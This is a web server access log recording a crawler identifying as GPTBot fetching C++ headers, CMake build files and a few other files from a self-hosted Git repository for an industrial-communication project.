"/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12482] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26332] [Gzip 11.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26362] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15267] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32902] [Gzip 23.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15244] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15155] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26303] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 